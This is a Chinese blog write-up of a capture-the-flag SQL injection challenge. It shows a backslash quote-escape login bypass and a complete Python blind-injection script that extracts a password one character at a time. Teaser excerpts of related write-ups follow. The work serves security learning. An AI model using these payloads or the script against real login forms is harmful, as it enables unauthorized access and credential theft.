[BJDCTF 2nd]简单注入

于 2021-08-21 22:07:54 发布
阅读量165 收藏
点赞数
分类专栏: CTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/119845656
版权

SQL注入 转义符 盲注 安全防护 PHP $_POST
关键词由CSDN通过智能技术生成

知识点:\转义符进行sql注入绕过,sql盲注

解题过程

在这里插入图片描述
首先是个这样的登录界面,在hint.txt中可以找到sql语句
在这里插入图片描述

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

根据这个语句,可以使用\转义符,将$_POST["username"]后的'进行转义,然后使得$_POST["username"]的第一个引号和$_POST["password"]的第一个引号进行闭合,然后之后的password通过#结尾即可

测试

输入
username: admin\
password: or/**/(2>1)#

在这里插入图片描述

盲注脚本

根据这个可以写脚本

import requests
import time
url= 'http://79c017a5-f4df-4057-83f8-315fcae911e9.node4.buuoj.cn:81/index.php'

result = ''

data = {
"username":"admin\\",
"password":""
}
for i in range(1,50):
    print(i)
    low = 32
    high = 127
    mid = (low + high)>>1
    while(low < high):
        
        payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid)
        data['password'] = payload
        r = requests.post(url = url,data = data)
        time.sleep(0.05)
        if r.status_code == 429:
            print("too fast")
            time.sleep(0.5)
        if "BJD needs to be stronger" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high)>>1
        if(mid == 32 or mid == 127):
            break
    result += chr(mid)
    print(result)
Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]简单注入 -wp
freerats的博客
07-17 541
拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 有一条后台查询语句 回到登入框处,尝试注入,发现加单双引号都被过滤 fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用不了,报错注入无回显也不行。考虑盲注。 当username=admin&a.
BJDCTF 2nd(WEB复现)
ChenZIDu的博客
04-02 857
记录一下,以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露 一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。 因为exec()无回显,而且没有禁curl。所以可以反弹shell~~ ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
buuctf [CISCN 2019 初赛]Love Math&&[BJDCTF 2nd]简单注入
为之的博客
07-15 692
一、[CISCN 2019 初赛]Love Math 根据代码意思,应该就是通过使用白名单函数或者当成变量来使用,同时要求长度小于80 看到最后的exec,我们需要构造出system($_GET['a']),而这个已经被挡住了,我们可以传入a=system,b=cat /flag来获取flag 但还是需要得到_GET,另外中括号可以用大括号代替 base_convert(number,frombase,tobase); 将number从frombase进制转化为tobase进制 hex2b.
[BJDCTF 2nd]简单注入 详细wp
weixin_45887311的博客
07-28 658
又开始刷SQL注入的题目,从这道简单注入下手 首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt 有后端语句比较好构造了,结果又过滤,要fuzz探测一下 发现select还有 ' "都被过滤了 幸好空格和反斜杠没有被过滤。。。。 fuzz.txt (可以自己添加) select from ascii substr table column by schema where extractvalue exp if / ( ) % ! @ # $ ^ &...
【学习笔记 43】 buu [BJDCTF 2nd]简单注入
weixin_43553654的博客
08-02 1117
0x00 知识点 \转义单引号 整型注入 二分法脚本 0x01 解题思路 打开网站一看, 再尝试在用户名和密码处尝试进行注入,发现‘,“都会报错,之后用御剑一扫,发现hint.txt文件。访问一下看看 提示说之后正确的用户和密码才能登上去,得到flag。之后给出了传参方式和mysql命令语句。 这时候很明显username处注入\来转义单引号,password处使用sql语句整数型注入。 举个例子: a. 传入admin\ 和 or/**/length(database())>0#会回显st
BUUCTF:[BJDCTF 2nd]fake google-----有总结的py3的payload----py3的SSTI
Zero_Adam的博客
02-14 143
目录:一、学会的新东西:二、开始WP先判断类型三、warnings.catch_warnings模块入手找到我们要找的模块四、在尝试另外一个模块 注入点好找的很,不多说。 开头的不了,都会, 问题是找到我们要利用的模块在哪里 这个才是重点。。绕过的还是先不急, 一步一步打好基础,碰到绕过的题的时候再说 一、学会的新东西: py2,py3都适用的查找模块位置的payload,,(这个真的我吐血弄了半上午才弄出来的。你要是采纳了的话,记得点个赞哦!!!里面还有班长的智慧结晶呢) 知道了py3的ssti主要是
-----已搬运-------[BJDCTF 2nd]:文件探测 -- springf()注入漏洞 ---PHP伪协议文件读取 ---ssrf ----PHP代码审计----session密码算法绕过
Zero_Adam的博客
03-15 232
访问网页的时候,后面用#这个定位符可以使得后面的内容失效。 也可以用参数的形式使其失效 比如: q2必须以http://127.0.0.1/开头,不能包含flag顺序出现的字符,后面会拼接y1ng.txt,我们用#注释掉拼接信息,即传入参数http://127.0.0.1/admin.php#,最后执行http://127.0.0.1/admin.php#.y1ng.txt,或者用http://127.0.0.1/admin.php?,最后执行http://127.0.0.1/admin.php?.y1ng
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1594
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
[BJDCTF 2nd]简单注入---关于整数型注入的一些理解
StevenOnesir的博客
12-30 344
本次以BJDCTF的题目,简单对整数型注入做一些讲解。 首先进入界面: 看到的是比较友善的登录界面,考虑题目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。 因此开始考虑整数型注入。 既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。 在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。 我们构建第一个payload: username=a password=1 or length(da
[BJDCTF 2nd]简单注入(过滤了引号,利用\逃逸sql语句第二字段)
qq_45521281的博客
04-28 1323
进入后页面: 看看后台用什么闭合的,测试单引号: 发现直接就给你过滤了。试试还过滤了什么,发现过滤了以下指令: (这个方法挺巧的) union , select , = , ' , & , && , - , " , and 连引号都过滤了,这可怎么做啊。 看看又什么提示,源码里面啥也没有,扫描一下发现robots.txt: 发现了hint.txt提示,访问看看: ...
[BJDCTF 2nd]简单注入【Bool+Regexp注入
D.MIND 的博客
04-28 454
这道题跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写 文章目录Regexp注入布尔盲注脚本 首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like 但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕) 本题有个hint可以通过robots.txt发现 Only u input the correct password then u can get the flag and p3rh4ps wants a girl f
BJDCTF2nd
Amherstieae的博客
05-25 1116
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
BJDCTF 2nd总结
rreally的博客
03-26 1415
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前三个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值